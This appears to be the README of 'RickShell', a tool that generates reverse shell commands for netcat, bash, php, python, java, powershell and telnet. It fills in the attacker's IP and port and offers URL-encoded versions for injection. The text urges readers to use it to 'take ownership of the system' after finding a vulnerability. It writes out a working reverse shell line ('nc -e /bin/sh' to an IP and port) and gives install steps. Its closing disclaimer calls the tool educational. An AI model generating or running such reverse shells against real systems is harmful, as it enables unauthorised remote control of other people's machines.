use one of the reverse shell commands in this tool to take ownership of the system when you find a vulnerability that you can exploit ;-)
RickShell command gives you the top 10 most used shells. The tool will automatically type your ip address and a suitable port into the command.
- 
RickShell -p netcatnetcat reverse shell commands.
- 
RickShell -p bashbash reverse shell commands.
- 
RickShell -p phpphp reverse shell commands.
- 
RickShell -p pythonpython reverse shell commands.
- 
RickShell -p javajava reverse shell commands.
- 
RickShell -p powershellpowershell reverse shell commands.
- 
RickShell -p telnettelnet reverse shell commands.
these commands automatically assign your ip address and port. ๐ช
- e.g: nc -e /bin/sh 192.168.100.23 4444
but if you want to use a different ip and port, you can use the following arguments
- RickShell -ip 192.168.1.1 --port 4242
- RickShell -p bash -ip 192.168.1.1 --port 4242etc.
๐ if you are going to use it in the url, use the following command. this sets your shell command for the url (-ue)
- RickShell -ue/- RickShell -p bash -ue/
- RickShell -ip 192.168.1.1 --port 4242 -ueetc.
git clone https://github.com/Rickidevs/RickShell.git
cd RickShell
chmod +x setup.sh
./setup.sh
you are fully responsible for legal or illegal use. remember that this tool is designed for education

